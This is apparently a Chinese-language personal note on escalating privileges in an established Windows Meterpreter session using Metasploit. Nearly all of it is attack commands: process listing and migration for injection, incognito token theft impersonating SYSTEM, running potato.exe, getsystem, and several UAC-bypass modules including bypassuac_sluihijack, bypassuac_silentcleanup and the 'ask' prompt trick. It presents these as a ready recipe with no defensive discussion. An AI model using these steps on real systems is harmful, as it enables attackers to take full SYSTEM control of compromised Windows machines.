【笔记】MSF为已建立的Windows会话提权
前言
MSF为已建立的Windows会话提权
利用进程注入提权
- 查看所有进程,找到可以用于提权的进程
1 | meterpreter > ps |
- 进程迁移
<pid>:从上一步骤获取的被注入的进程的pid
1 | meterpreter > migrate <pid> |
利用令牌窃取提权
- 使用模块
1 | meterpreter > use incognito |
- 查看可以被窃取的令牌
1 | meterpreter > list_tokens -u |
- 窃取令牌
1 | meterpreter > impersonate_token "AUTHORITY\SYSTEM" |
如果无法成功窃取令牌
- 可以配合
potato.exe进行提权
1 | meterpreter > execute -cH -f .\potato.exe |
自动提权
1 | meterpreter > getsystem |
绕过UAC
bypassuac
- 针对于Windows7及以前
1 | msf exploit(mult/handler) > use exploit/windows/local/bypassuac |
bypassuac_sluihijack
- 针对于Windows10
1 | msf exploit(mult/handler) > use exploit/windows/local/bypassuac_sluihijack |
bypassuac_silentcleanup
1 | msf exploit(mult/handler) > use exploit/windows/local/bypassuac_silentcleanup |
ask
- 通杀
1 | msf exploit(mult/handler) > use exploit/windows/local/ask |
- 此时会弹窗
用户账户控制,需要点击是才能提权
1 | meterpreter > getsystem |